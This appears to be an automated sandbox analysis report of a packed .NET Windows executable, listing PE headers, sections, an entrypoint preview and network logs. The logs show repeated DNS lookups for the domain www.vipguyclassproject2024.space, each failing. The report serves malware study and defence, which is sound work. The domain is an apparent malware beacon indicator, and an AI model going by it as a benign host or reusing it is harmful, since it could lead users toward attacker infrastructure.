TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe81f8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xea000	0x5b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xec000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe6250	0xe6400	e024985ca9446a05f6b67121ea73ffd6	False	0.9830601927252985	data	7.988838794549899	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xea000	0x5b8	0x800	1df0921b916320feb512d9c2f6fcbc8f	False	0.3173828125	data	3.3339806865010586	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xec000	0xc	0x400	756ee87c57079290f77fa30f44ec6299	False	0.025390625	data	0.05585530805374581	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xea090	0x328	data			0.41707920792079206
RT_MANIFEST	0xea3c8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 08:56:24.270512104 CEST	60192	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:56:24.280669928 CEST	53	60192	1.1.1.1	192.168.2.5
Jul 3, 2024 08:56:28.331130981 CEST	61610	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:56:28.343866110 CEST	53	61610	1.1.1.1	192.168.2.5
Jul 3, 2024 08:56:33.409312963 CEST	65402	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:56:33.466813087 CEST	53	65402	1.1.1.1	192.168.2.5
Jul 3, 2024 08:56:38.535712957 CEST	50595	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:56:38.827802896 CEST	53	50595	1.1.1.1	192.168.2.5
Jul 3, 2024 08:56:43.893645048 CEST	58625	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:56:43.903305054 CEST	53	58625	1.1.1.1	192.168.2.5
Jul 3, 2024 08:56:48.971956015 CEST	65040	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:56:49.069515944 CEST	53	65040	1.1.1.1	192.168.2.5
Jul 3, 2024 08:56:54.143879890 CEST	54260	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:56:54.153686047 CEST	53	54260	1.1.1.1	192.168.2.5
Jul 3, 2024 08:56:59.112674952 CEST	60015	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:56:59.122919083 CEST	53	60015	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:03.393755913 CEST	56407	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:03.403296947 CEST	53	56407	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:08.909529924 CEST	54031	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:08.918978930 CEST	53	54031	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:13.581195116 CEST	53645	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:13.593436003 CEST	53	53645	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:18.549947977 CEST	59921	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:18.560497999 CEST	53	59921	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:23.331290960 CEST	60719	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:23.342292070 CEST	53	60719	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:28.319273949 CEST	62678	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:28.327120066 CEST	53	62678	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:33.315313101 CEST	50854	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:33.323407888 CEST	53	50854	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:38.315375090 CEST	51070	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:38.325294971 CEST	53	51070	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:43.315311909 CEST	59992	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:43.365637064 CEST	53	59992	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:48.315514088 CEST	54681	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:48.494849920 CEST	53	54681	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:53.316277981 CEST	55012	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:53.325556993 CEST	53	55012	1.1.1.1	192.168.2.5
Jul 3, 2024 08:57:58.319196939 CEST	64831	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:57:58.326651096 CEST	53	64831	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:03.315529108 CEST	57789	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:03.330084085 CEST	53	57789	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:08.315574884 CEST	59626	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:08.325579882 CEST	53	59626	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:13.315798998 CEST	53036	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:13.324846029 CEST	53	53036	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:18.315737009 CEST	59966	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:18.324537039 CEST	53	59966	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:23.316168070 CEST	56079	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:23.327635050 CEST	53	56079	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:28.315675974 CEST	62697	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:28.325026989 CEST	53	62697	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:33.317519903 CEST	50968	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:33.325328112 CEST	53	50968	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:38.315308094 CEST	61951	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:38.325536013 CEST	53	61951	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:43.315426111 CEST	55558	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:43.329607964 CEST	53	55558	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:48.315768957 CEST	55030	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:48.325776100 CEST	53	55030	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:53.316962004 CEST	61891	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:53.327050924 CEST	53	61891	1.1.1.1	192.168.2.5
Jul 3, 2024 08:58:58.315200090 CEST	60589	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:58:58.322714090 CEST	53	60589	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:03.315196037 CEST	59749	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:03.324140072 CEST	53	59749	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:08.315299988 CEST	64053	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:08.324922085 CEST	53	64053	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:13.315197945 CEST	59358	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:13.327971935 CEST	53	59358	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:18.316107035 CEST	62174	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:18.328504086 CEST	53	62174	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:23.319614887 CEST	51220	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:23.328694105 CEST	53	51220	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:28.315279007 CEST	50479	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:28.322148085 CEST	53	50479	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:33.315345049 CEST	63988	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:33.323002100 CEST	53	63988	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:38.315784931 CEST	58822	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:38.328473091 CEST	53	58822	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:43.315524101 CEST	57975	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:43.427354097 CEST	53	57975	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:48.315165043 CEST	64733	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:48.355978966 CEST	53	64733	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:53.315262079 CEST	59437	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:53.324678898 CEST	53	59437	1.1.1.1	192.168.2.5
Jul 3, 2024 08:59:58.315330982 CEST	64109	53	192.168.2.5	1.1.1.1
Jul 3, 2024 08:59:58.322719097 CEST	53	64109	1.1.1.1	192.168.2.5
Jul 3, 2024 09:00:03.315283060 CEST	57816	53	192.168.2.5	1.1.1.1
Jul 3, 2024 09:00:03.323411942 CEST	53	57816	1.1.1.1	192.168.2.5
Jul 3, 2024 09:00:08.315629005 CEST	60387	53	192.168.2.5	1.1.1.1
Jul 3, 2024 09:00:08.324614048 CEST	53	60387	1.1.1.1	192.168.2.5
Jul 3, 2024 09:00:13.315690994 CEST	55897	53	192.168.2.5	1.1.1.1
Jul 3, 2024 09:00:13.323545933 CEST	53	55897	1.1.1.1	192.168.2.5
Jul 3, 2024 09:00:18.317969084 CEST	53065	53	192.168.2.5	1.1.1.1
Jul 3, 2024 09:00:18.327438116 CEST	53	53065	1.1.1.1	192.168.2.5
Jul 3, 2024 09:00:23.315448999 CEST	60803	53	192.168.2.5	1.1.1.1
Jul 3, 2024 09:00:23.346307039 CEST	60803	53	192.168.2.5	1.1.1.1
Jul 3, 2024 09:00:23.582281113 CEST	53	60803	1.1.1.1	192.168.2.5
Jul 3, 2024 09:00:23.583151102 CEST	53	60803	1.1.1.1	192.168.2.5
Jul 3, 2024 09:00:28.318608999 CEST	52027	53	192.168.2.5	1.1.1.1
Jul 3, 2024 09:00:28.325944901 CEST	53	52027	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 08:56:24.270512104 CEST	192.168.2.5	1.1.1.1	0x9c75	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:28.331130981 CEST	192.168.2.5	1.1.1.1	0xcffd	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:33.409312963 CEST	192.168.2.5	1.1.1.1	0xe10a	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:38.535712957 CEST	192.168.2.5	1.1.1.1	0xd8af	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:43.893645048 CEST	192.168.2.5	1.1.1.1	0xc65f	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:48.971956015 CEST	192.168.2.5	1.1.1.1	0x273d	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:54.143879890 CEST	192.168.2.5	1.1.1.1	0x7af8	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:59.112674952 CEST	192.168.2.5	1.1.1.1	0x488c	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:03.393755913 CEST	192.168.2.5	1.1.1.1	0x1590	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:08.909529924 CEST	192.168.2.5	1.1.1.1	0xc2bc	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:13.581195116 CEST	192.168.2.5	1.1.1.1	0xcfa9	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:18.549947977 CEST	192.168.2.5	1.1.1.1	0xd8ac	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:23.331290960 CEST	192.168.2.5	1.1.1.1	0xaef6	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:28.319273949 CEST	192.168.2.5	1.1.1.1	0x2b8a	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:33.315313101 CEST	192.168.2.5	1.1.1.1	0xc2ac	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:38.315375090 CEST	192.168.2.5	1.1.1.1	0x3056	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:43.315311909 CEST	192.168.2.5	1.1.1.1	0xb1e6	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:48.315514088 CEST	192.168.2.5	1.1.1.1	0xd971	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:53.316277981 CEST	192.168.2.5	1.1.1.1	0x5141	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:58.319196939 CEST	192.168.2.5	1.1.1.1	0xaea1	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:03.315529108 CEST	192.168.2.5	1.1.1.1	0x8a29	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:08.315574884 CEST	192.168.2.5	1.1.1.1	0xde4c	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:13.315798998 CEST	192.168.2.5	1.1.1.1	0x7a2a	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:18.315737009 CEST	192.168.2.5	1.1.1.1	0x103d	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:23.316168070 CEST	192.168.2.5	1.1.1.1	0x1aa5	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:28.315675974 CEST	192.168.2.5	1.1.1.1	0x3027	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:33.317519903 CEST	192.168.2.5	1.1.1.1	0x8e0b	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:38.315308094 CEST	192.168.2.5	1.1.1.1	0xca69	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:43.315426111 CEST	192.168.2.5	1.1.1.1	0x4ce2	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:48.315768957 CEST	192.168.2.5	1.1.1.1	0x1082	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:53.316962004 CEST	192.168.2.5	1.1.1.1	0x4d67	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:58.315200090 CEST	192.168.2.5	1.1.1.1	0x3eaf	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:03.315196037 CEST	192.168.2.5	1.1.1.1	0x3be7	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:08.315299988 CEST	192.168.2.5	1.1.1.1	0x25da	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:13.315197945 CEST	192.168.2.5	1.1.1.1	0x4e18	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:18.316107035 CEST	192.168.2.5	1.1.1.1	0x95be	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:23.319614887 CEST	192.168.2.5	1.1.1.1	0x7fe6	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:28.315279007 CEST	192.168.2.5	1.1.1.1	0x12dd	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:33.315345049 CEST	192.168.2.5	1.1.1.1	0x4a46	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:38.315784931 CEST	192.168.2.5	1.1.1.1	0xd9a7	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:43.315524101 CEST	192.168.2.5	1.1.1.1	0x1ad4	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:48.315165043 CEST	192.168.2.5	1.1.1.1	0x25fd	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:53.315262079 CEST	192.168.2.5	1.1.1.1	0x66c5	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:58.315330982 CEST	192.168.2.5	1.1.1.1	0x612b	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:03.315283060 CEST	192.168.2.5	1.1.1.1	0x468b	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:08.315629005 CEST	192.168.2.5	1.1.1.1	0x219a	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:13.315690994 CEST	192.168.2.5	1.1.1.1	0xab96	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:18.317969084 CEST	192.168.2.5	1.1.1.1	0xdb20	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:23.315448999 CEST	192.168.2.5	1.1.1.1	0xe2f4	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:23.346307039 CEST	192.168.2.5	1.1.1.1	0xe2f4	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false
Jul 3, 2024 09:00:28.318608999 CEST	192.168.2.5	1.1.1.1	0xeb7e	Standard query (0)	www.vipguyclassproject2024.space	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 08:56:24.280669928 CEST	1.1.1.1	192.168.2.5	0x9c75	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:28.343866110 CEST	1.1.1.1	192.168.2.5	0xcffd	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:33.466813087 CEST	1.1.1.1	192.168.2.5	0xe10a	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:38.827802896 CEST	1.1.1.1	192.168.2.5	0xd8af	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:43.903305054 CEST	1.1.1.1	192.168.2.5	0xc65f	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:49.069515944 CEST	1.1.1.1	192.168.2.5	0x273d	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:54.153686047 CEST	1.1.1.1	192.168.2.5	0x7af8	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:56:59.122919083 CEST	1.1.1.1	192.168.2.5	0x488c	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:03.403296947 CEST	1.1.1.1	192.168.2.5	0x1590	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:08.918978930 CEST	1.1.1.1	192.168.2.5	0xc2bc	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:13.593436003 CEST	1.1.1.1	192.168.2.5	0xcfa9	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:18.560497999 CEST	1.1.1.1	192.168.2.5	0xd8ac	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:23.342292070 CEST	1.1.1.1	192.168.2.5	0xaef6	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:28.327120066 CEST	1.1.1.1	192.168.2.5	0x2b8a	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:33.323407888 CEST	1.1.1.1	192.168.2.5	0xc2ac	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:38.325294971 CEST	1.1.1.1	192.168.2.5	0x3056	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:43.365637064 CEST	1.1.1.1	192.168.2.5	0xb1e6	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:48.494849920 CEST	1.1.1.1	192.168.2.5	0xd971	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:53.325556993 CEST	1.1.1.1	192.168.2.5	0x5141	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:57:58.326651096 CEST	1.1.1.1	192.168.2.5	0xaea1	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:03.330084085 CEST	1.1.1.1	192.168.2.5	0x8a29	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:08.325579882 CEST	1.1.1.1	192.168.2.5	0xde4c	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:13.324846029 CEST	1.1.1.1	192.168.2.5	0x7a2a	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:18.324537039 CEST	1.1.1.1	192.168.2.5	0x103d	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:23.327635050 CEST	1.1.1.1	192.168.2.5	0x1aa5	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:28.325026989 CEST	1.1.1.1	192.168.2.5	0x3027	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:33.325328112 CEST	1.1.1.1	192.168.2.5	0x8e0b	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:38.325536013 CEST	1.1.1.1	192.168.2.5	0xca69	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:43.329607964 CEST	1.1.1.1	192.168.2.5	0x4ce2	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:48.325776100 CEST	1.1.1.1	192.168.2.5	0x1082	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:53.327050924 CEST	1.1.1.1	192.168.2.5	0x4d67	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:58:58.322714090 CEST	1.1.1.1	192.168.2.5	0x3eaf	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:03.324140072 CEST	1.1.1.1	192.168.2.5	0x3be7	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:08.324922085 CEST	1.1.1.1	192.168.2.5	0x25da	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:13.327971935 CEST	1.1.1.1	192.168.2.5	0x4e18	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:59:18.328504086 CEST	1.1.1.1	192.168.2.5	0x95be	Name error (3)	www.vipguyclassproject2024.space	none	none	A (IP address)	IN (0x0001)	false
